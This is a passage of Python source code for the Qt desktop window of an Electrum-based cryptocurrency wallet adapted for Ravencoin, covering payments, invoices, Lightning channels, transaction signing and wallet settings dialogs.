coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
try:
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
pubkey_msg = self.pubkey_e.text()
if pubkey_msg != '' and len(pubkey_msg) < 40:
outputs.append(
PartialTxOutput(
value=0,
scriptpubkey=
b'\x6a' +
len(pubkey_msg).to_bytes(1, 'big', signed=False) +
pubkey_msg.encode('ascii')
))
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
except InvoiceError as e:
self.show_error(_('Error creating payment') + ':\n' + str(e))
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
l = list(invoice.get_amount_sat().assets.keys())
if l:
a = l[0]
else:
a = None
self.pay_onchain_dialog(self.get_coins(asset=a), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, asset: str = None, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only, asset=asset)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_str = self.get_frozen_balance_str()
if frozen_str:
text += " ({} {})".format(
frozen_str, _("are frozen")
)
return text
# TODO: Currently only for ravencoin
def get_frozen_balance_str(self) -> Optional[str]:
frozen_bal = sum(self.wallet.get_frozen_balance(), RavenValue())
if not frozen_bal:
return None
return self.format_amount_and_units(frozen_bal.rvn_value)
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None,
coinbase_outputs=None,
change_addr=None,
mixed=False) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep,
coinbase_outputs=coinbase_outputs,
change_addr=change_addr)
output_value = \
sum([RavenValue(0, {x.asset: x.value}) if x.asset else RavenValue(x.value) for x in outputs +
(coinbase_outputs if coinbase_outputs else [])], RavenValue())
conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if conf_dlg.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not conf_dlg.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value,
mixed=mixed)
preview_dlg.show()
return
cancelled, is_send, password, tx = conf_dlg.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs, mixed=mixed)
else:
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value,
mixed=mixed)
preview_dlg.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password, mixed=False):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs, mixed=mixed)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None, mixed=False):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
def sign(tx, external_keypairs, password):
if external_keypairs:
# can sign directly
tx.sign(external_keypairs)
if not external_keypairs or mixed:
self.wallet.sign_transaction(tx, password)
task = partial(sign, tx, external_keypairs, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, *, funding_sat, node_id):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(
coins=coins,
funding_sat=funding_sat,
node_id=node_id,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
node_id, rest = extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
if self.wallet.lnworker.has_conflicting_backup_with(node_id):
msg = messages.MGS_CONFLICTING_BACKUP_INSTANCE
if not self.question(msg):
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(
connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, self.on_open_channel_success, on_failure)
def on_open_channel_success(self, args):
chan, funding_tx = args
lnworker = self.wallet.lnworker
if not chan.has_onchain_backup():
backup_dir = self.config.get_backup_dir()
if backup_dir is not None:
self.show_message(_(f'Your wallet backup has been updated in {backup_dir}'))
else:
data = lnworker.export_channel_backup(chan.channel_id)
help_text = _(messages.MSG_CREATED_NON_RECOVERABLE_CHANNEL)
self.show_qrcode(
data, _('Save channel backup'),
help_text=help_text,
show_copy_text_btn=True)
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
self.show_transaction(funding_tx)
else:
self.show_message(message)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
self.to_send_combo.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def set_ln_invoice(self, invoice: str):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice)
except LnInvoiceException as e:
self.show_error(_("Error parsing Lightning invoice") + f":\n{e}")
return
self.payto_e.lightning_invoice = invoice
pubkey = bh2u(lnaddr.pubkey.serialize())
for k, v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
# self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def set_bip21(self, text: str):
try:
out = util.parse_URI(text, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
def pay_to_URI(self, text: str):
if not text:
return
# first interpret as lightning invoice
bolt11_invoice = maybe_extract_bolt11_invoice(text)
if bolt11_invoice:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_bip21(text)
# update fiat amount
self.amount_e.textEdited.emit("")
self.show_send_tab()
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
# vbox.setContentsMargins(0, 0, 0, 0)
# vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', True))
l.show_toolbar(toolbar_shown)
return tab
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
#amount_str = self.format_amount(invoice.amount_sat.rvn_value.value) + ' ' + self.base_unit()
amount_str = invoice.amount_sat.__repr__()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(
map(lambda x: str(x.address) + ' : ' + self.format_amount(x.value) + (self.base_unit() if not x.asset else (' ' + x.asset)), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d), ))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': ravencoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0] == '_' or m in ['network', 'wallet', 'config', 'daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.status_label = QLabel("")
self.status_label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.status_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addPermanentWidget(self.status_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"),
self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.update_lightning_icon()
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"),
self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
# sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if not self.wallet.has_lightning():
self.lightning_button.setVisible(False)
return
if self.network is None or self.network.channel_db is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _(
'Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def init_lightning_dialog(self, dialog):
assert not self.wallet.has_lightning()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
if self.question(msg):
self._init_lightning_dialog(dialog=dialog)
@protected
def _init_lightning_dialog(self, *, dialog, password):
dialog.close()
self.wallet.init_lightning(password=password)
self.update_lightning_icon()
self.show_message(_('Lightning keys have been initialized.'))
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(800, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('False')
if self.wallet.has_seed():
seed_available = _('True')
ks = self.wallet.keystore
assert isinstance(ks, keystore.Deterministic_KeyStore)
seed_available += f" ({ks.get_seed_type()})"
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name") + ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type") + ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type") + ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
from .util import IconLabel
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
else:
label = IconLabel(text='Enabled, non-recoverable channels')
label.setIcon(read_QIcon('nocloud'))
grid.addWidget(label, 5, 1)
if self.wallet.db.get('seed_type') == 'segwit':
msg = _(
"Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
grid.addWidget(HelpButton(msg), 5, 3)
grid.addWidget(QLabel(_('Lightning Node ID:')), 7, 0)
# TODO: ButtonsLineEdit should have a addQrButton method
nodeid_text = self.wallet.lnworker.node_keypair.pubkey.hex()
nodeid_e = ButtonsLineEdit(nodeid_text)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
nodeid_e.addButton(qr_icon, lambda: self.show_qrcode(nodeid_text, _("Node ID")), _("Show QR Code"))
nodeid_e.addCopyButton(self.app)
nodeid_e.setReadOnly(True)
nodeid_e.setFont(QFont(MONOSPACE_FONT))
grid.addWidget(nodeid_e, 8, 0, 1, 4)
else:
if self.wallet.can_have_lightning():
grid.addWidget(QLabel('Not enabled'), 5, 1)
button = QPushButton(_("Enable"))
button.pressed.connect(lambda: self.init_lightning_dialog(dialog))
grid.addWidget(button, 5, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")),
5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx + 1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx + 1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
